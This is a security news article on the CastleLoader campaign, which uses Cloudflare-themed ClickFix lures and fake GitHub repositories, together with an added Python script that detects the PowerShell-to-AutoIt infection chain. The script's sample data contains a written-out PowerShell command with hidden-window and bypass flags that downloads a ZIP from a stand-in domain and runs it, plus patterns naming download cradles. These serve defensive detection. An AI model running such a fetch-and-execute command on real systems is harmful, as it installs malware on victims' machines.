Sunday, January 18, 2026

Windows Computers Targeted in New CastleLoader Attack Leveraging Cloudflare-Inspired Clickfix Method

Cybersecurity researchers have uncovered an active wave of infections targeting Windows systems via a novel malware loader known as CastleLoader.

First detected in early 2025, CastleLoader has rapidly evolved into a significant distribution platform for various information-stealing and remote access Trojans (RATs).

With over 1,600 attack attempts observed, including an alarming 28.7% infection rate among users who interacted with malicious links, the campaign demonstrates a high degree of technical sophistication and social engineering.

Clickfix Phishing and Fake GitHub Repositories: New Avenues for Malware Delivery

Central to the CastleLoader campaign is the so-called Clickfix technique, leveraging convincing phishing pages themed after Cloudflare and credible developer tools.

Attackers deploy realistic replicas of error messages, captchas, and verification steps, often masquerading as browser updates, video call platforms, or document verification systems.

When unsuspecting users attempt to resolve fake errors, they are instructed to copy and execute a PowerShell command, unwittingly running malicious code on their machine.

For development-focused victims, the threat actors also create fake GitHub repositories that imitate trusted open-source projects and tools.

In one observed case, a fraudulent SQL Server Management Studio repository included a trojanized installer linked to the CastleLoader delivery infrastructure, exploiting the inherent trust users place in reputable sites, such as GitHub.

Technical Analysis: Multi-Stage Infection and Robust C2 Architecture

When the PowerShell command is executed, it downloads a malicious ZIP file from the attacker’s domain, extracts it to the local system, and executes a packaged AutoIt script.

This script injects shellcode directly into memory and immediately connects to a Command and Control (C2) server to retrieve additional payloads.
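The chain described above (a pasted PowerShell one-liner launched from the desktop shell, a ZIP staged in a user-writable folder, then an AutoIt interpreter running the dropped script) leaves a recognisable parent/child process trail. The following detection logic is an added example written for this article, not code from the researchers or from any vendor product: it walks constructed Sysmon-style process-creation events and scores the sequence. The event field names, the file paths, the `lure.example.invalid` domain and the sample events are all constructed for illustration.

```python
"""Flag the ClickFix -> PowerShell -> ZIP -> AutoIt chain in process-creation events.

Added example (not from the article). Events are dicts shaped loosely like
Sysmon Event ID 1 records; the field names and sample data are constructed.
"""
import re
from collections import defaultdict

# Stage 1: the pasted "fix" is a PowerShell one-liner with a download cradle,
# usually hidden-window / bypass flags, and a ZIP extraction step.
CRADLE = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl)\b", re.I)
EVASION = re.compile(r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass|-nop\b|-(e|ec|enc|encodedcommand)\s", re.I)
ARCHIVE = re.compile(r"expand-archive|\.zip\b", re.I)
INTERACTIVE_PARENTS = {"explorer.exe"}  # Win+R / Run dialog and desktop launches

# Stages 2/3: the extracted payload runs from a user-writable directory, and the
# AutoIt interpreter is identified by its PE OriginalFileName even when renamed on disk.
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|programdata|public)\\", re.I)
AUTOIT = re.compile(r"^autoit3?(_x64)?\.exe$", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def stage1_indicators(ev, parent):
    """Indicators that a PowerShell launch looks like a ClickFix paste."""
    ind = []
    if _basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return ind
    cmd = ev["cmdline"]
    if parent and _basename(parent["image"]) in INTERACTIVE_PARENTS:
        ind.append("interactive_parent")
    if CRADLE.search(cmd):
        ind.append("download_cradle")
    if EVASION.search(cmd):
        ind.append("evasion_flags")
    if ARCHIVE.search(cmd):
        ind.append("zip_stage")
    return ind


def descendant_indicators(root_pid, children):
    """Walk every descendant of root_pid looking for the staged AutoIt payload."""
    ind, seen = [], []
    stack = list(children.get(root_pid, []))
    while stack:
        ev = stack.pop()
        seen.append(ev["pid"])
        if AUTOIT.match(ev.get("original_file_name", "")):
            renamed = not AUTOIT.match(_basename(ev["image"]))
            ind.append("renamed_autoit" if renamed else "autoit_interpreter")
        if USER_WRITABLE.search(ev["image"]):
            ind.append("exec_from_user_dir")
        stack.extend(children.get(ev["pid"], []))
    return ind, seen


def find_chains(events):
    """Return one finding per PowerShell launch that carries a download cradle,
    enriched with what its child processes did. The cradle is required because
    hidden-window or bypass flags alone are common in legitimate admin scripts."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    findings = []
    for e in events:
        ind = stage1_indicators(e, by_pid.get(e["ppid"]))
        if "download_cradle" not in ind:
            continue
        more, desc = descendant_indicators(e["pid"], children)
        ind += more
        autoit_seen = "autoit_interpreter" in ind or "renamed_autoit" in ind
        severity = "high" if autoit_seen or len(ind) >= 4 else "medium"
        findings.append({"pid": e["pid"], "indicators": ind, "descendants": desc, "severity": severity})
    return findings


# Constructed sample: one ClickFix chain and one benign PowerShell session.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "original_file_name": "EXPLORER.EXE", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": PS, "original_file_name": "PowerShell.EXE",
     "cmdline": r'powershell -w hidden -ep bypass -c "iwr http://lure.example.invalid/verify.zip -OutFile $env:TEMP\v.zip; Expand-Archive $env:TEMP\v.zip $env:TEMP\v; & $env:TEMP\v\setup.exe"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Users\u\AppData\Local\Temp\v\setup.exe", "original_file_name": "AutoIt3.exe", "cmdline": "setup.exe script.a3x"},
    {"pid": 400, "ppid": 100, "image": PS, "original_file_name": "PowerShell.EXE", "cmdline": "powershell -NoProfile -Command Get-ChildItem"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\whoami.exe", "original_file_name": "whoami.exe", "cmdline": "whoami"},
]

if __name__ == "__main__":
    for f in find_chains(SAMPLE_EVENTS):
        print(f)
```

Two design points matter in practice. Requiring the download cradle before raising a finding keeps the rule from firing on every hidden-window administrative script, and matching the AutoIt interpreter on its PE OriginalFileName rather than the on-disk name catches the common trick of shipping the interpreter under an innocuous filename alongside the `.a3x` script.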

Depending on the campaign, CastleLoader deploys information stealers such as StealC, RedLine, and DeerStealer; RATs such as NetSupport RAT and SectopRAT; and additional loaders, including HijackLoader.

CastleLoader’s attack chain and distribution mechanism.

Behind the scenes, CastleLoader’s C2 infrastructure offers a feature-rich web panel resembling a professional malware-as-a-service (MaaS) operation.

Operators can manage infections, craft customized campaigns, geo-target victims, and deploy payloads via Dockerized containers for added stealth and security.

Detailed telemetry, including system IDs, IP addresses, and execution statistics, is provided for every compromised system.

The rapid adoption and success of CastleLoader underscore a growing trend: cybercriminals are increasingly focusing on exploiting human psychology and trusted platforms, rather than relying solely on technical exploits.

The campaign’s innovative use of clipboard “poisoning” and fake repositories demonstrates that even sophisticated security systems can be bypassed when attackers target end-user behavior.

With over 469 confirmed infections, including numerous U.S. government entities, CastleLoader underscores the urgent need for revamped security awareness training and robust monitoring of social engineering vectors within the enterprise.
